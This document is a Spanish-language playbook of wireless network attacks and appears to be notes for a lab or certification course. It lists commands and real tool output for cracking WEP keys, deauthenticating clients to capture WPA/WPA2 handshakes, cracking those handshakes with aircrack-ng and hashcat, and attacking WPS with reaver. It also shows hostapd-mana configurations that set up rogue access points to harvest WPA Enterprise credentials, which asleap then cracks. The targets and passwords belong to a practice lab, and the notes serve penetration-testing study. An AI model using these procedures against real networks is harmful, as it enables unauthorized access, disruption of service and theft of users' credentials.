Wireless Attacks
Wireless Attacks
Configuración Adaptador
Verificar si está correctamente configurado el adaptador de red.
iwconfigVerificar la frecuencia del adaptador de red.
iwlist wlan0 frequencyiwlist wlan0 scanningEstatus de interfaz de red.
iw dev wlan0mon infoairmon-ngRevisar procesos conflictivos que afectan a la interfaz de red.
airmon-ng checkMatar procesos conflictivos que afectan a la interfaz de red.
airmon-ng check killkillall dhclient wpa_supplicantLevantar interfaz de red en modo monitor.
airmon-ng start wlan0Detener interfaz de red en modo monitor.
airmon-ng stop wlan0monModificación de dirección MAC
Modificar dirección MAC del dispositivo.
ifconfig wlan0mon downListar dirección MAC actual y modificada.
macchanger -s wlan0monCambiar dirección MAC aleatoriamente del adaptador.
macchanger -a wlan0monRestablecer dirección MAC original.
macchanger -p wlan0monLevantar la interfaz de red.
ifconfig wlan0mon upRestablecer configuración de red
Reiniciar el servicio network-manager para restablecer la configuración de red.
systemctl restart NetworkManager.serviceSniffing de red
Sniffing con airodump-ng.
airodump-ng wlan0monSniffing de red especifica.
airodump-ng -c 6 -w capture --essid doomhack wlan0monAtaques WEP
Fake Authentication
Este ataque es útil cuando no hay ningún cliente conectado a la red.
airodump-ng -c 6 -w capture --bssid FA:6E:EE:78:B8:2D wlan0monEjecución de ataque.
aireplay-ng -1 0 -e doomhack -a FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE wlan0monDe-autenticación
Este ataque es útil cuando hay clientes conectados a la red.
airodump-ng -c 6 -w capture --bssid FA:6E:EE:78:B8:2D wlan0monEjecución de ataque.
aireplay-ng -0 10 -e doomhack -c 82:D0:D3:B8:9F:FE wlan0monARP Request Replay
Este ataque requiere tráfico de red de lo contrario no recolectará la suficiente información, es necesario mínimo 100k de información.
airodump-ng wlan0monCH 10 ][ Elapsed: 6 s ][ 2026-01-18 17:12
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F0:9F:C2:71:22:11 -28 10 430 0 3 54 WEP WEP wifi-oldairodump-ng -c 3 -w capture --bssid F0:9F:C2:71:22:11 wlan0monCH 3 ][ Elapsed: 6 s ][ 2026-01-18 17:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F0:9F:C2:71:22:11 -28 0 72 2896 390 3 54 WEP WEP wifi-old
BSSID STATION PWR Rate Lost Frames Notes Probes
F0:9F:C2:71:22:11 82:C4:D4:B6:23:BF -29 54 -54 4 2888Primero realizar una fake authentication.
aireplay-ng -1 0 -e wifi-old -a F0:9F:C2:71:22:11 -h 00:C0:CA:A7:1C:BE wlan0monThe interface MAC (02:00:00:00:00:00) doesn't match the specified MAC (-h).
ifconfig wlan0mon hw ether 00:C0:CA:A7:1C:BE
17:06:06 Waiting for beacon frame (BSSID: F0:9F:C2:71:22:11) on channel 3
17:06:06 Sending Authentication Request (Open System)
17:06:06 Authentication successful
17:06:06 Sending Association Request
17:06:06 Association successful :-) (AID: 1)Despues realizar ARP Replay hasta obtener un got a deauth.
aireplay-ng -3 -b F0:9F:C2:71:22:11 -h 00:C0:CA:A7:1C:BE wlan0monThe interface MAC (02:00:00:00:00:00) doesn't match the specified MAC (-h).
ifconfig wlan0mon hw ether 00:C0:CA:A7:1C:BE
17:08:33 Waiting for beacon frame (BSSID: F0:9F:C2:71:22:11) on channel 3
Saving ARP requests in replay_arp-0118-170834.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 9057 packets (got 10 ARP requests and 0 ACKs), sent 4404 packets...(499 ppsRead 9159 packets (got 10 ARP requests and 0 ACKs), sent 4454 packets...(499 ppsNotice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 9263 packets (got 10 ARP requests and 0 ACKs), sent 4505 packets...(500 ppsRead 9365 packets (got 10 ARP requests and 0 ACKs), sent 4555 packets...(500 ppsReadSi hay clientes podríamos saltarnos el paso de fake/ARP replay y solo realizar una deautenticacion.
aireplay-ng -0 10 -e wifi-old -c 82:C4:D4:B6:23:BF wlan0mon17:16:35 Waiting for beacon frame (ESSID: wifi-old) on channel 3
Found BSSID "F0:9F:C2:71:22:11" to given ESSID "wifi-old".
17:16:35 Sending 64 directed DeAuth (code 7). STMAC: [82:C4:D4:B6:23:BF] [ 0| 0 ACKs]
17:16:35 Sending 64 directed DeAuth (code 7). STMAC: [82:C4:D4:B6:23:BF] [ 0| 0 ACKs]Cracking de información.
aircrack-ng -0 capture-01.capRead 119245 packets.
# BSSID ESSID Encryption
1 F0:9F:C2:71:22:11 wifi-old WEP (20195 IVs)
Choosing first network as target.
Reading packets, please wait...
Opening capture-01.cap
Read 119249 packets.
1 potential targets
Attack will be restarted every 5000 captured ivs.
Aircrack-ng 1.7 rev f333a6a7
[00:00:03] Tested 88 keys (got 20655 IVs)
KB depth byte(vote)
0 0/ 1 11(32000) 45(27136) E3(26624) 2C(26112) 32(26112)
1 0/ 1 BB(33280) C4(29696) 8C(28928) 5C(28672) 5E(28160)
2 0/ 2 81(29952) FF(28160) C9(27904) E4(27648) F8(27392)
3 4/ 6 CD(26368) 8A(26368) 99(26112) 9B(26112) C6(26112)
4 6/ 8 55(26624) DE(26624) B2(26368) 38(26112) D8(26112)
KEY FOUND! [ 11:BB:33:CD:55 ]
Decrypted correctly: 100%Interactive Packet Replay
Para este ataque se requiere aumentar el tráfico de red creando una conexión ficticia.
airodump-ng -c 6 -w capture --bssid FA:6E:EE:78:B8:2D wlan0monEjecución de ataque.
aireplay-ng -1 0 -e doomhack -a FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE wlan0monConexión del cliente ficticio.
aireplay-ng -2 -b FA:6E:EE:78:B8:2D -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 wlan0monCracking de información.
aircrack-ng -z -0 arp01.capFragmentation Attack Clientless
Este ataque puede ser útil cuando no hay clientes conectados a la red.
airodump-ng -c 3 -w fragcapture --bssid FA:6E:EE:78:B8:2D mon0Se puede ejecutar el ataque de diferentes formas.
aireplay-ng -1 60 -e doomhack -a FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE mon0aireplay-ng -5 -b FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE mon0packetforge-ng -0 –a FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE -k 192.168.100.255 -l 192.168.100.170 -y frag.xor -w inject.capaireplay-ng -2 -r inject.cap mon0Cracking de información.
aircrack-ng fragcapture.capChop Chop Attack Clientless
Este ataque puede ser útil cuando no hay clientes conectados a la red.
airodump-ng -c 3 -w fragcapture --bssid FA:6E:EE:78:B8:2D mon0Se puede ejecutar el ataque de diferentes formas.
aireplay-ng -1 60 -e doomhack -a FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE mon0aireplay-ng -4 -b FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE mon0packetforge-ng -0 –a FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE -k 192.168.100.255 -l 192.168.100.170 -y replay_dec_1216-123300.xor -w inject.capaireplay-ng -2 -rr inject.cap mon0Cracking de información.
aircrack-ng koreccapture-01.capAtaques WEP SHARED
SKA Type Cracking
Este tipo de ataque es util cuando la red esta utilizando seguridad SHARED.
airodump-ng -c 3 -w fragcapture --bssid FA:6E:EE:78:B8:2D mon0Se puede ejecutar el ataque de diferentes formas.
aireplay-ng -1 0 -e 'doomhack' -a 00:14:D1:E1:C7:62 -h 00:c0:ca:36:22:9e mon0aireplay-ng -0 10 -e doomhack -c 82:D0:D3:B8:9F:FE mon0aireplay-ng -1 6000 -q 5 -e doomhack -y file.xor -a FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE mon0aireplay-ng -3 -b FA:6E:EE:78:B8:2D -h 00:C0:CA:A7:1C:BE mon0aireplay-ng -0 1 -e doomhack -c 82:D0:D3:B8:9F:FE mon0Cracking de información.
aircrack-ng -z -0 arp01.capAtaques WPA / WPA2
Deauthentication
Este ataque es útil cuando hay clientes conectados a la red. Elegimos el que tenga más Frames.
airodump-ng -c 6 -w capture.cap --bssid F0:9F:C2:71:22:12 wlan0mon CH 6 ][ Elapsed: 2 mins ][ 2026-01-18 17:29 ][
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F0:9F:C2:71:22:12 -28 0 1602 814 3 6 54 WPA2 CCMP PSK wifi-mobile
BSSID STATION PWR Rate Lost Frames Notes Probes
F0:9F:C2:71:22:12 28:6C:07:6F:F9:44 -29 54 -54 0 20
F0:9F:C2:71:22:12 28:6C:07:6F:F9:43 -29 54 -54 0 2066 Ejecución del ataque.
aireplay-ng -0 10 -e wifi-mobile -c 28:6C:07:6F:F9:43 wlan0mon17:28:13 Waiting for beacon frame (ESSID: wifi-mobile) on channel 6
Found BSSID "F0:9F:C2:71:22:12" to given ESSID "wifi-mobile".
17:28:13 Sending 64 directed DeAuth (code 7). STMAC: [28:6C:07:6F:F9:43] [ 0| 0 ACKs]
17:28:14 Sending 64 directed DeAuth (code 7). STMAC: [28:6C:07:6F:F9:43] [ 0| 0 ACKs]Con esto obtendremos el handshake.
CH 6 ][ Elapsed: 2 mins ][ 2026-01-18 17:29 ][ WPA handshake: F0:9F:C2:71:22:12
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F0:9F:C2:71:22:12 -28 0 1602 814 3 6 54 WPA2 CCMP PSK wifi-mobile
BSSID STATION PWR Rate Lost Frames Notes Probes
F0:9F:C2:71:22:12 28:6C:07:6F:F9:44 -29 54 -54 0 20
F0:9F:C2:71:22:12 28:6C:07:6F:F9:43 -29 54 -54 0 2066 EAPOLCracking de información.
aircrack-ng -w rockyou-top100000.txt capture.cap-01.capReading packets, please wait...
Opening capture.cap-01.cap
Read 3497 packets.
# BSSID ESSID Encryption
1 F0:9F:C2:71:22:12 wifi-mobile WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening capture.cap-01.cap
Read 3497 packets.
1 potential targets
Aircrack-ng 1.7 rev f333a6a7
[00:00:00] 5154/1000000 keys tested (11028.80 k/s)
Time left: 1 minute, 30 seconds 0.52%
KEY FOUND! [ starwars1 ]
Master Key : A0 12 65 41 EA 6C E1 01 1E 1D C4 D9 E5 A3 87 7E
77 53 66 F8 1B F4 9B 3B DC A5 0C 01 5A 47 25 2C
Transient Key : D1 08 59 36 A1 39 16 5E 26 67 BB BC 3F 75 0F A4
6E 02 A7 18 4B C2 4E 39 3F 30 B4 BD 09 54 33 B5
04 4A 29 A5 A3 4D 54 30 8E 1D 8A 4F D6 CF 23 D2
DE 45 62 E0 44 F9 40 85 B2 8A 19 A2 BA A5 45 58
EAPOL HMAC : EC 10 63 3F 04 1E 82 98 03 43 28 3C 25 D1 C3 8EAtaques WPS
Obtener información sobre el access point. Wash escanea bandas 2.4GHz por defecto para que escanee bandas 5GHz necesitamos usar la opcion -5 en el comando.
wash -i wlan0monwash -5 -i wlan0monEjecución del ataque.
reaver -b 34:08:04:09:3D:38 -i wlan0mon -vPixieWPS
Este ataque es más rápido que el anterior.
reaver -b 34:08:04:09:3D:38 -i wlan0mon -v -KRogue Access Point
Iniciar interfaz de red en modo monitor.
airmon-ng start wlan0Captura de tráfico para analizar con wireshark.
airodump-ng -w discovery wlan0mon CH 3 ][ Elapsed: 30 s ][ 2026-01-18 19:08
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F0:9F:C2:71:22:10 -28 21 36 14 6 54 OPN wifi-guest
32:4B:6F:A2:04:DD -28 21 0 0 6 54 WPA2 CCMP PSK WIFI-JUAN
F0:9F:C2:71:22:12 -28 21 24 9 6 54 WPA2 CCMP PSK wifi-mobile
96:9A:0A:EE:7E:AE -28 21 0 0 6 54 WPA2 CCMP PSK MiFibra-5-D6G3
F0:9F:C2:1A:CA:25 -28 18 10 0 11 54e WPA3 CCMP SAE wifi-IT
F0:9F:C2:6A:88:26 -28 18 0 0 11 54 OPN <length: 9>
F0:9F:C2:11:0A:24 -28 18 0 0 11 54e WPA3 CCMP SAE wifi-management
72:56:98:C6:A7:B9 -28 20 0 0 9 54 WPA2 TKIP PSK vodafone7123
82:C5:14:19:56:47 -28 38 0 0 3 54 WPA2 CCMP PSK MOVISTAR_JYG2
F0:9F:C2:71:22:11 -28 38 1572 95 3 54 WEP WEP wifi-old
F0:9F:C2:71:22:13 -28 21 0 0 8 54 WPA2 CCMP PSK wifi-eventFiltro para obtener información desde wireshark.
wlan.fc.type_subtype == 0x08 && wlan.ssid == "wifi-mobile"Una vez obtenido los datos configuramos el access point.
apt install hostapd-manaDetener modo monitor.
airmon-ng stop wlan0monCreamos un archivo mana.conf
root@WiFiChallengeLab:~/rogue-ap# nano rogue.confinterface=wlan0
ssid=wifi-mobile
channel=6
hw_mode=g
ieee80211n=1
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_passphrase=ANYPASSWORD
wpa_pairwise=TKIP
rsn_pairwise=TKIP CCMP
mana_wpaout=/root/rogue-ap/event.hccapxCaptura de handshake
root@WiFiChallengeLab:~/rogue-ap# hostapd-mana rogue.confConfiguration file: rogue.conf
MANA: Captured WPA/2 handshakes will be written to file '/root/rogue-ap/event.hccapx'.
Using interface wlan0 with hwaddr 4a:a9:a9:06:20:56 and ssid "wifi-event"
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLEDEn caso de que no se capture el handshake se requiere una segunda interfaz de red para de-autenticar a los clientes.
aireplay-ng -0 0 -a F0:9F:C2:71:22:12 wlan1mon19:29:47 Waiting for beacon frame (BSSID: F0:9F:C2:71:22:12) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
19:29:47 Sending DeAuth (code 7) to broadcast -- BSSID: [F0:9F:C2:71:22:12]
19:29:47 Sending DeAuth (code 7) to broadcast -- BSSID: [F0:9F:C2:71:22:12]
19:29:48 Sending DeAuth (code 7) to broadcast -- BSSID: [F0:9F:C2:71:22:12]
19:29:48 Sending DeAuth (code 7) to broadcast -- BSSID: [F0:9F:C2:71:22:12]Captura de handshake.
root@WiFiChallengeLab:~/rogue-ap# hostapd-mana rogue.conf
Configuration file: rogue.conf
MANA: Captured WPA/2 handshakes will be written to file '/root/rogue-ap/event.hccapx'.
Using interface wlan0 with hwaddr ca:1f:0b:1c:ee:05 and ssid "wifi-mobile"
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED
wlan0: STA 28:6c:07:6f:f9:44 IEEE 802.11: authenticated
wlan0: STA 28:6c:07:6f:f9:44 IEEE 802.11: associated (aid 1)
wlan0: STA 28:6c:07:6f:f9:43 IEEE 802.11: authenticated
MANA: Captured a WPA/2 handshake from: 28:6c:07:6f:f9:44
MANA WPA2 HASHCAT | WPA*02*a9ef740d7234f67cedfbbf09ca5fd026*ca1f0b1cee05*286c076ff944*776966692d6d6f62696c65*39054620532c76938752c7748a5a7ebc4b2faf283ce548dba5da1bce58a76321*0103007502010a00000000000000000001665ef1ec118ffadcbfd207fb9b7506b29b74f2955a452ccfc76f42cf5c81ffe0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000*00Cracking de la información.
aircrack-ng mostar.hccapx -e Mostar -w /usr/share/john/password.lstEn caso de que no genere el archivo hccapx podemos intentar creackear el hash con hashcat.
hashcat -m 22000 hash.txt ../rockyou-top100000.txtHost memory required for this attack: 65 MB
Dictionary cache built:
* Filename..: ../rockyou-top100000.txt
* Passwords.: 1000000
* Bytes.....: 8583863
* Keyspace..: 1000000
* Runtime...: 0 secs
f03ee9becf9f8ecd212a7ca206f421a6:ca1f0b1cee05:286c076ff943:wifi-mobile:starwars1
Session..........: hashcat
Status...........: Cracked
Hash.Name........: WPA-PBKDF2-PMKID+EAPOL
Hash.Target......: hash.txt
Time.Started.....: Sun Jan 18 19:43:45 2026 (1 sec)
Time.Estimated...: Sun Jan 18 19:43:46 2026 (0 secs)
Guess.Base.......: File (../rockyou-top100000.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3194 H/s (9.78ms) @ Accel:96 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 5175/1000000 (0.52%)
Rejected.........: 3639/5175 (70.32%)
Restore.Point....: 4100/1000000 (0.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: dominick -> strawberriesCaptive Portals
Sniffing del tráfico de red.
airodump-ng -w discovery --output-format pcap wlan0monDe-autenticacion de clientes para capturar handshake.
aireplay-ng -0 0 -a 00:0E:08:90:3A:5F wlan0monAtaques WPA Enterprise
Identificar access point con el protocolo de seguridad MGT.
airodump-ng --band abg wlan0mon CH 112 ][ Elapsed: 36 s ][ 2026-01-18 17:38
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F0:9F:C2:7A:33:28 -25 15 4 0 44 54e WPA2 CCMP MGT wifi-regional-tablets
F0:9F:C2:71:22:17 -25 15 27 0 44 54e WPA2 CCMP MGT wifi-global
F0:9F:C2:71:22:1A -25 15 6 0 44 54e WPA2 CCMP MGT wifi-corp
F0:9F:C2:71:22:16 -25 15 4 0 44 54e WPA2 CCMP MGT wifi-regional
F0:9F:C2:71:22:15 -25 15 6 0 44 54e WPA2 CCMP MGT wifi-corp
F0:9F:CB:3F:BC:27 -25 15 0 0 44 54 WPA2 CCMP MGT wifi-corp-legacyCaptura de handshake con deautenticacion.
airodump-ng -c 44 --bssid F0:9F:C2:71:22:15 -w capture wlan0mon CH 44 ][ Elapsed: 6 s ][ 2026-01-18 17:42
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F0:9F:C2:71:22:15 -25 0 71 7 0 44 54e WPA2 CCMP MGT wifi-corp
BSSID STATION PWR Rate Lost Frames Notes Probes
F0:9F:C2:71:22:15 64:32:A8:BA:6C:41 -1 54e- 0 0 7aireplay-ng -0 1 -a F0:9F:C2:71:22:15 -c 64:32:A8:BA:6C:41 wlan0mon17:44:08 Waiting for beacon frame (BSSID: F0:9F:C2:71:22:15) on channel 44
17:44:08 Sending 64 directed DeAuth (code 7). STMAC: [64:32:A8:BA:6C:41] [ 0| 0 ACKs] CH 44 ][ Elapsed: 1 min ][ 2026-01-18 17:45 ][ WPA handshake: F0:9F:C2:71:22:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F0:9F:C2:71:22:15 -26 0 976 96 0 44 54e WPA2 CCMP MGT wifi-corp
BSSID STATION PWR Rate Lost Frames Notes Probes
F0:9F:C2:71:22:15 64:32:A8:BA:6C:41 -26 54e-54e 0 860 PMKIDDetener modo monitor.
airmon-ng stop wlan0monFiltrar contenido en wireshark para extraer certificado.
wlan.bssid == F0:9F:C2:71:22:15 && eap && tls.handshake.certificateFrame 1610: 51 bytes on wire (408 bits), 51 bytes captured (408 bits)
IEEE 802.11 QoS Data, Flags: ......F.
Logical-Link Control
802.1X Authentication
Extensible Authentication Protocol
Code: Request (1)
Id: 49
Length: 13
Type: Protected EAP (EAP-PEAP) (25)
EAP-TLS Flags: 0x01
[3 EAP-TLS Fragments (2797 bytes): #1606(1393), #1608(1397), #1610(7)]
Transport Layer Security
TLSv1.2 Record Layer: Handshake Protocol: Server Hello
TLSv1.2 Record Layer: Handshake Protocol: Certificate
Content Type: Handshake (22)
Version: TLS 1.2 (0x0303)
Length: 2412
Handshake Protocol: Certificate
Handshake Type: Certificate (11)
Length: 2408
Certificates Length: 2405
Certificates (2405 bytes)
Certificate Length: 1159
Certificate: 308204833082036ba003020102020102300d06092a864886f70d01010b05003081a7310b… (pkcs-9-at-emailAddress=server@WiFiChallenge.com,id-at-commonName=WiFiChallenge CA,id-at-organizationalUnitName=Server,id-at-organizationName=WiFiChal
signedCertificate
algorithmIdentifier (sha256WithRSAEncryption)
Padding: 0
encrypted: 3cb58f92976b91bd002bce25a9656a411be4b44c2fc19265bdc81c6fcc1e0edf4bdb473a…
Certificate Length: 1240
Certificate: 308204d4308203bca00302010202143d544b5d509a595a035fe095c0886eba2c40c85130… (pkcs-9-at-emailAddress=ca@WiFiChallenge.com,id-at-commonName=WiFiChallenge CA,id-at-organizationalUnitName=Certificate Authority,id-at-organizationNa
TLSv1.2 Record Layer: Handshake Protocol: Server Key Exchange
TLSv1.2 Record Layer: Handshake Protocol: Server Hello DoneGuardamos el certificado Certificate: 308204833082036ba003020102020102300d06092a864886f70d01010b05003081a7310b… como cert.der desde wireshark y lo analizamos con openssl.
openssl x509 -inform der -in cert.der -textCertificate:
Data:
Version: 3 (0x2)
Serial Number: 2 (0x2)
Signature Algorithm: sha256WithRSAEncryption
Issuer: C = ES, ST = Madrid, L = Madrid, O = WiFiChallenge, OU = Certificate Authority, CN = WiFiChallenge CA, emailAddress = ca@WiFiChallenge.com
Validity
Not Before: Dec 20 17:05:10 2024 GMT
Not After : Dec 18 17:05:10 2034 GMT
Subject: C = ES, L = Madrid, O = WiFiChallenge, OU = Server, CN = WiFiChallenge CA, emailAddress = server@WiFiChallenge.comModificamos los siguientes archivos.
nano /etc/freeradius/3.0/certs/ca.cnf[certificate_authority]
countryName = ES
stateOrProvinceName = Madrid
localityName = Madrid
organizationName = WiFiChallenge
emailAddress = ca@WiFiChallenge.com
commonName = "WiFiChallenge CA"nano /etc/freeradius/3.0/certs/server.cnf[server]
countryName = ES
stateOrProvinceName = Madrid
localityName = Madrid
organizationName = WiFiChallenge
emailAddress = server@WiFiChallenge.com
commonName = "WiFiChallenge CA"Realizamos los siguientes comandos.
root@WiFiChallengeLab:/etc/freeradius/3.0/certs# rm dh
root@WiFiChallengeLab:/etc/freeradius/3.0/certs# make
openssl dhparam -out dh -2 2048
Generating DH parameters, 2048 bit long safe prime
...
<SNIP>
...
chmod g+r client.key
openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr -key 'whatever' -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf
Using configuration from ./client.cnf
Check that the request matches the signature
Signature ok
The countryName field is different between
CA certificate (ES) and the request (FR)
make: *** [Makefile:120: client.crt] Error 1Lo siguiente es crear dos archivos.
root@WiFiChallengeLab:~/wifi-corp# cat mana.eap_user * PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]root@WiFiChallengeLab:~/wifi-corp# cat network.confssid=wifi-corp
interface=wlan0
driver=nl80211
channel=44
hw_mode=a
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/root/wifi-corp/mana.eap_user
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/root/wifi-corp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1Iniciamos el access point falso.
root@WiFiChallengeLab:~/wifi-corp# hostapd-mana network.confConfiguration file: network.conf
MANA: Captured credentials will be written to file '/root/wifi-corp/hostapd.credoutfile'.
Using interface wlan0 with hwaddr 9a:08:ec:9d:d3:a9 and ssid "wifi-corp"
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLEDAhora requerimos una segunda interfaz de red en modo monitor.
airmon-ng start wlan1Requerimos ejecutar nuevamente el sniffing de red para deautenticar a los usuarios. En este caso hay dos redes con el mismo nombre por lo tanto es necesario realizar lo mismo para ambos al mismo tiempo.
airodump-ng -c 44 --bssid F0:9F:C2:71:22:15 wlan1mon
airodump-ng -c 44 --bssid F0:9F:C2:71:22:1A wlan1monEjecutamos la deautenticacion a todos los usuarios por cada access point.
root@WiFiChallengeLab:/home/user# aireplay-ng -0 1 -a F0:9F:C2:71:22:15 wlan1mon
18:35:36 Waiting for beacon frame (BSSID: F0:9F:C2:71:22:15) on channel 44
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
18:35:36 Sending DeAuth (code 7) to broadcast -- BSSID: [F0:9F:C2:71:22:15]root@WiFiChallengeLab:/home/user# aireplay-ng -0 1 -a F0:9F:C2:71:22:1A wlan1mon
18:35:46 Waiting for beacon frame (BSSID: F0:9F:C2:71:22:1A) on channel 44
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
18:35:46 Sending DeAuth (code 7) to broadcast -- BSSID: [F0:9F:C2:71:22:1A]Una vez deautenticados se intentaran conectar a nuestro access point fake y obtendremos el hash del usuario.
root@WiFiChallengeLab:~/wifi-corp# hostapd-mana network.conf
Configuration file: network.conf
MANA: Captured credentials will be written to file '/root/wifi-corp/hostapd.credoutfile'.
Using interface wlan0 with hwaddr e6:b1:c7:d5:cb:96 and ssid "wifi-corp"
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED
wlan0: STA 64:32:a8:07:6c:40 IEEE 802.11: authenticated
wlan0: STA 64:32:a8:07:6c:40 IEEE 802.11: associated (aid 1)
wlan0: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:40
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 0: CONTOSO\juan.tr
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP Identity Phase 1: CONTOSO\juan.tr
MANA EAP EAP-MSCHAPV2 ASLEAP user=juan.tr | asleap -C c5:77:07:e2:3d:f0:c1:38 -R ec:aa:e9:c1:75:38:a4:ae:2d:e0:8e:3b:2b:6e:cc:c9:a8:cd:ca:5d:46:65:ac:5e
MANA EAP EAP-MSCHAPV2 JTR | juan.tr:$NETNTLM$c57707e23df0c138$ecaae9c17538a4ae2de08e3b2b6eccc9a8cdca5d4665ac5e:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | juan.tr::::ecaae9c17538a4ae2de08e3b2b6eccc9a8cdca5d4665ac5e:c57707e23df0c138Cracking de la informacion.
asleap -C c5:77:07:e2:3d:f0:c1:38 -R ec:aa:e9:c1:75:38:a4:ae:2d:e0:8e:3b:2b:6e:cc:c9:a8:cd:ca:5d:46:65:ac:5e -W ../rockyou-top100000.txtasleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using wordlist mode with "../rockyou-top100000.txt".
hash bytes: 343c
NT hash: fae3b1692331659f40239932a409343c
password: bulldogs1234Técnicas de Cracking
Airolib-ng
echo doomhack > essid.txtairolib-ng doomhack --import essid essid.txtairolib-ng doomhack --import passwd password.lstairolib-ng doomhack --batchairolib-ng doomhack --statsaircrack-ng -r doomhack wpa.capcoWPAtty Dictionary Mode
cowpatty -r wpa-01.cap -f password.lst -2 -s doomhackcoWPAtty Rainbow Table Mode
genpmk -f password.lst -d doomdic -s doomhackcowpatty -r wpa-01.cap -d doomdic -2 -s doomhackPyrit Dictionary Attack
pyrit -r wpa-01.cap analyzepyrit -e doomhack -r wpa-01.cap -i password.lst attack_passthroughPyrit Database Mode
pyrit evalpyrit -i password.lst import_passwordspyrit -e doomhack create_essidpyrit batchpyrit -r wpa-01.cap attack_dbDescifrar tráfico de red
airdecap-ng -e doomhack -p doom1234 wpa-01.capConectarse manualmente Access Point
Redes abiertas
wpa_supplicant -i wlan0 -c wifi-client.confnetwork={
ssid="hotel_wifi"
scan_ssid=1
}Redes WEP
El password debe estar en minúsculas y sin el signo :.
network={
ssid="wifi-old"
key_mgmt=NONE
wep_key0=11bb33cd55
wep_tx_keyidx=0
}Redes WPA/WPA2
wpa_supplicant -i wlan0 -c wifi-client.confnetwork={
ssid="wifi-mobile"
scan_ssid=1
psk="starwars1"
key_mgmt=WPA-PSK
}Redes WPA/WPA2 Enterprise
wpa_supplicant -i wlan0 -c wifi-client.confnetwork={
ssid="wifi-corp"
scan_ssid=1
key_mgmt=WPA-EAP
identity="CONTOSO\juan.tr"
password="bulldogs1234"
eap=PEAP
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}Obtener IP
Actualizar DHCP para obtener IP.
dhclient -v wlan0Referencias
https://pierrelouis.blog/posts/oswp-lab-setup/
https://zeyadazima.com/notes/oswplaybook/#attacking-wpa-enterprise
https://lab.wifichallenge.com/